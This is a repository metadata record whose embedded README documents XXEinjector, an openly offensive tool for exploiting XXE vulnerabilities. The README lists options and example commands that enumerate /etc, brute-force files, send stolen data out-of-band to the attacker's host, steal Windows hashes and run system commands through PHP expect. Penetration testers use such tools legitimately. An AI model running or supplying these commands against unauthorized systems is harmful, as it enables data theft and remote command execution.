{"id":13454525,"url":"https://github.com/enjoiz/XXEinjector","last_synced_at":"2025-03-24T06:30:51.842Z","repository":{"id":32147353,"uuid":"35720248","full_name":"enjoiz/XXEinjector","owner":"enjoiz","description":"Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.","archived":false,"fork":false,"pushed_at":"2024-12-01T15:25:27.000Z","size":94,"stargazers_count":1544,"open_issues_count":0,"forks_count":313,"subscribers_count":54,"default_branch":"master","last_synced_at":"2024-12-01T16:31:35.629Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Ruby","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/enjoiz.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2015-05-16T10:56:14.000Z","updated_at":"2024-12-01T15:25:31.000Z","dependencies_parsed_at":"2022-09-09T10:00:33.928Z","dependency_job_id":null,"html_url":"https://github.com/enjoiz/XXEinjector","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/enjoiz%2FXXEinjector","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/enjoiz%2FXXEinjector/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/enjoiz%2FXXEinjector/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/enjoiz%2FXXEinjector/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/enjoiz","download_url":"https://codeload.github.com/enjoiz/XXEinjector/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245222245,"owners_count":20580116,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T08:00:54.978Z","updated_at":"2025-03-24T06:30:51.836Z","avatar_url":"https://github.com/enjoiz.png","language":"Ruby","funding_links":[],"categories":["Exploitation","Weapons"],"sub_categories":["XXE","XXE Injection","Tools"],"readme":"## XXEinjector\n\nXXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.\n\n## Options:\u003cbr /\u003e\n```\n  --host\t    Mandatory - our IP address for reverse connections. (--host=192.168.0.2)\n  --file\t    Mandatory - file containing valid HTTP request with xml. You can also mark with \"XXEINJECT\" a point where DTD should be injected. (--file=/tmp/req.txt)\n  --path\t    Mandatory if enumerating directories - Path to enumerate. (--path=/etc)\n  --brute\t    Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt)\n  --logger\t    Log results only. Do not send requests. HTTP logger looks for \"p\" parameter with results.\n  \n  --rhost\t    Remote host's IP address or domain name. Use this argument only for requests without Host header. (--rhost=192.168.0.3)\n  --rport\t    Remote host's TCP port. Use this argument only for requests without Host header and for non-default values. (--rport=8080)\n\n  --oob\t\t    Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java \u003c 1.7 applications. Gopher can only be used in Java \u003c 1.7 applications. (--oob=http/ftp/gopher)\n  --direct\t    Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify --direct-xml to see how XML in request file should look like or --localdtd-xml if you want to use local DTD during exploitation. In case of any problems with start and end marks when special characters are present in reponse before or after output data please use Burp Proxy match and replace option to replace that. (--direct=UNIQUEMARKSTART,UNIQUEMARKEND)\n  --cdata\t    Improve direct exploitation with CDATA. Data is retrieved directly, however OOB is used to construct CDATA payload. Specify --cdata-xml to see how request should look like in this technique.\n  --2ndfile\t    File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)\n  --phpfilter\tUse PHP filter to base64 encode target file before sending.\n  --netdoc      Use netdoc protocol instead of file (Java).\n  --enumports\tEnumerating unfiltered ports for reverse connection. Specify value \"all\" to enumerate all TCP ports. (--enumports=21,22,80,443,445)\n\n  --hashes\t    Steals Windows hash of the user that runs an application.\n  --expect\t    Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls)\n  --upload\t    Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt)\n  --xslt\t    Tests for XSLT injection.\n\n  --ssl\t\t    Use SSL.\n  --proxy\t    Proxy to use. (--proxy=127.0.0.1:8080)\n  --httpport\tSet custom HTTP port. (--httpport=80)\n  --ftpport\t    Set custom FTP port. (--ftpport=21)\n  --gopherport\tSet custom gopher port. (--gopherport=70)\n  --jarport\t    Set custom port for uploading files using jar. (--jarport=1337)\n  --xsltport\tSet custom port for XSLT injection test. (--xsltport=1337)\n\n  --test\t    This mode shows request with injected payload and quits. Used to verify correctness of request without sending it to a server.\n  --urlencode\tURL encode injected DTD. This is default for URI.\n  --nodtd\t    If you want to put DTD in request by yourself. Specify \"--oob-xml\" to show how DTD should look like.\n  --output\t    Output file for bruteforcing and logger mode. By default it logs to brute.log in current directory. (--output=/tmp/out.txt)\n  --timeout\t    Timeout for receiving file/directory content. (--timeout=20)\n  --contimeout\tTimeout for closing connection with server. This is used to prevent DoS condition. (--contimeout=20)\n  --fast\t    Skip asking what to enumerate. Prone to false-positives.\n  --verbose\t    Show verbose messages.\n```\n\n## Example usage:\u003cbr /\u003e\n```\n  Enumerating /etc directory in HTTPS application:\n  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl\n  Enumerating /etc directory using gopher for OOB method:\n  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher\n  Second order exploitation:\n  ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt\n  Bruteforcing files using HTTP out of band method and netdoc protocol:\n  ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc\n  Enumerating using direct exploitation:\n  ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARKSTART,UNIQUEMARKEND\n  Enumerating unfiltered ports:\n  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all\n  Stealing Windows hashes:\n  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes\n  Uploading files using Java jar:\n  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf\n  Executing system commands using PHP expect:\n  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls\n  Testing for XSLT injection:\n  ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt\n  Log requests only:\n  ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt\n```\n\n**Disclaimer**\n\nThis repository contains tool developed strictly for educational purposes. Any misuse of the tool for illegal activities is strictly prohibited.\n\n**Legal Notice**\n\nIt is important to understand and comply with all local laws and regulations related to cybersecurity and ethical hacking. Unauthorized access to computer systems, networks, or data is illegal and punishable by law. The developer of this repository is not responsible for any misuse of the tools contained herein.\n\nBy using the tools in this repository, you agree to use them responsibly and ethically. Always obtain explicit permission before testing or attempting to access any network, system, or data that does not belong to you.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fenjoiz%2FXXEinjector","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fenjoiz%2FXXEinjector","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fenjoiz%2FXXEinjector/lists"}